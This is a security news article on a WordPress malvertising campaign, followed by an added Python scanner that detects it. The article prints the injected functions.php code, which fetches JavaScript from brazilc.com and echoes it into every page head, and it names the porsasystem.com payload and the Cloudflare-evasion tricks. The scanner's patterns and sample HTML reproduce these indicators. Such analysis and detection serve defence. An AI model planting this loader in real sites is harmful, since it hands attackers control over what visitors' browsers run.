WordPress website: Hackers Covertly Insert Malicious PHP Codes to Weaponize Sites


Threat actors are increasingly targeting WordPress websites in an effort to profit from traffic and jeopardize visitor security.

A fresh malvertising effort has surfaced in recent months, using quiet PHP code injections in theme files to deliver undesired third-party scripts.

The attack blends in with normal site operations: it serves obfuscated JavaScript that redirects visitors, shows pop-ups, and evades security tooling without drawing attention to itself.

The breach was first spotted by a site owner who noticed unexpected script loads; its source turned out to be a small chunk of PHP code added to the functions.php file of the active theme.

This injection ran behind the scenes on each request rather than changing the content of the visible page.

The campaign was identified after Sucuri analysts observed unusual JavaScript requests to attacker-controlled domains and several security vendors began blocking it.

The attack mainly exploits weak file permissions and out-of-date themes. Once the hackers obtain write access, frequently via compromised credentials or vulnerable plugins, they inject a seemingly harmless function that communicates with a command-and-control server.

The function is called via the wp_head hook, retrieves a dynamic JavaScript payload, and echoes it into the <head> section of the page, which guarantees the payload executes before the rest of the page loads.

The injected function fetches the malicious script and embeds it straight into the HTML document after establishing a POST connection to a remote endpoint at hxxps://brazilc[.]com/ads.php, according to Sucuri researchers.

The payload carries out two primary tasks: injecting a hidden 1×1 pixel iframe that imitates Cloudflare's challenge platform, and loading a traffic-distribution script from porsasystem.com/6m9x.js.

By passing off harmful activity as authentic CDN activities, these strategies allow for forced redirects, pop-ups, and security scanner avoidance.

Infection Mechanism

The PHP function that is injected into functions.php is what makes the infection technique work:

```php
// Injected PHP function found in the active theme's functions.php
function ti_custom_javascript() {
    // POST the site's own URL to the attacker's endpoint and fetch the payload
    $response = wp_remote_post(
        'https://brazilc.com/ads.php',
        array('timeout' => 15, 'body' => array('url' => home_url()))
    );
    // Echo whatever JavaScript the server returned straight into <head>
    if (!is_wp_error($response)) {
        echo wp_remote_retrieve_body($response);
    }
}
// Hook the function into wp_head so it runs on every page load
add_action('wp_head', 'ti_custom_javascript');
```

This function runs silently on every page load, contacting the C&C server and echoing the JavaScript payload it returns into the page header.

Then, using attributes like data-cfasync='false' and async to get around Cloudflare Rocket Loader, the attacker's script loads more malicious code asynchronously.

The malware avoids detection by embedding itself inside a hidden iframe, where it remains until the injected code is eliminated.
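The following is an added detection example, not code from the article or from Sucuri. It covers both halves of the story above: the server-side injection (a function hooked into wp_head that fetches a remote body and echoes it into the page) and the client-side indicators (an external script carrying data-cfasync="false" and async, and a hidden 1×1 iframe). The theme source and HTML it scans are constructed samples; the hostnames brazilc.com and porsasystem.com come from the article, the iframe src and the site host are placeholders. The PHP parsing is regex-based and heuristic, which is enough for triage of a theme directory but not a substitute for a full integrity check against a known-good copy.

```python
"""Heuristic checks for the wp_head injection pattern and its client-side indicators."""
import re

# Server side: functions registered on wp_head, their bodies, remote fetches, echoed bodies.
HOOK_RE = re.compile(r"""add_action\(\s*['"]wp_head['"]\s*,\s*['"]([A-Za-z0-9_]+)['"]""")
FUNC_RE = re.compile(r"function\s+([A-Za-z0-9_]+)\s*\([^)]*\)\s*\{")
REMOTE_RE = re.compile(r"wp_remote_(?:post|get|request)\s*\(")
ECHO_BODY_RE = re.compile(r"echo\s+wp_remote_retrieve_body")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Client side: <script>/<iframe> tags and their attributes (quoted, unquoted or boolean).
TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([A-Za-z][A-Za-z0-9-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?""")


def _function_bodies(php_source):
    """Map function name -> body text, found by brace matching from each header."""
    bodies = {}
    for m in FUNC_RE.finditer(php_source):
        depth, i = 1, m.end()
        while i < len(php_source) and depth:
            depth += {"{": 1, "}": -1}.get(php_source[i], 0)
            i += 1
        bodies[m.group(1)] = php_source[m.end():i - 1]
    return bodies


def scan_theme_php(php_source):
    """Flag wp_head-hooked functions that fetch a remote body and echo it into the page."""
    findings = []
    bodies = _function_bodies(php_source)
    for name in HOOK_RE.findall(php_source):
        body = bodies.get(name, "")
        fetches = bool(REMOTE_RE.search(body))
        if not fetches:
            continue  # a wp_head function that only emits static markup is normal
        hosts = sorted(set(URL_RE.findall(body)))
        issue = ("fetches a remote body and echoes it into <head>"
                 if ECHO_BODY_RE.search(body) else "makes a remote request from wp_head")
        findings.append({"function": name, "issue": issue, "hosts": hosts})
    return findings


def _attrs(raw):
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}


def scan_rendered_html(html, site_host):
    """Flag external data-cfasync=false scripts and hidden/1x1 iframes in served HTML."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, a = m.group(1).lower(), _attrs(m.group(2))
        host_m = URL_RE.search(a.get("src", ""))
        host = host_m.group(1) if host_m else site_host  # relative src means same host
        if tag == "script" and host != site_host and a.get("data-cfasync", "").lower() == "false":
            issue = "external script opts out of Rocket Loader via data-cfasync=false"
            if "async" in a:
                issue += " and loads async"
            findings.append({"tag": "script", "host": host, "issue": issue})
        elif tag == "iframe":
            tiny = a.get("width") in ("1", "1px") and a.get("height") in ("1", "1px")
            hidden = "display:none" in a.get("style", "").replace(" ", "").lower()
            if tiny or hidden:
                findings.append({"tag": "iframe", "host": host, "issue": "hidden 1x1 iframe"})
    return findings


# Constructed sample: the injected function from the article plus a benign wp_head function.
SAMPLE_FUNCTIONS_PHP = r'''<?php
function ti_custom_javascript() {
    $response = wp_remote_post(
        'https://brazilc.com/ads.php',
        array('timeout' => 15, 'body' => array('url' => home_url()))
    );
    if (!is_wp_error($response)) {
        echo wp_remote_retrieve_body($response);
    }
}
add_action('wp_head', 'ti_custom_javascript');

function theme_meta_tags() {
    echo '<meta name="generator" content="example-theme">';
}
add_action('wp_head', 'theme_meta_tags');
'''

# Constructed sample page: site host and iframe src are placeholders, not from the article.
SAMPLE_HTML = '''<html><head>
<script data-cfasync="false" async src="https://porsasystem.com/6m9x.js"></script>
<script src="https://example-site.test/wp-includes/js/jquery.js"></script>
</head><body>
<iframe src="https://attacker.example/challenge" width="1" height="1" style="display:none"></iframe>
<p>content</p></body></html>'''

if __name__ == "__main__":
    for f in scan_theme_php(SAMPLE_FUNCTIONS_PHP) + scan_rendered_html(SAMPLE_HTML, "example-site.test"):
        print(f)
```

Run against a real install by reading every .php file under wp-content/themes and the HTML of a few rendered pages; anything reported by scan_theme_php is worth comparing line by line against the theme's upstream copy, since a legitimate theme has no reason to echo a remote response into wp_head.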

About The Author:

Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space.  Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
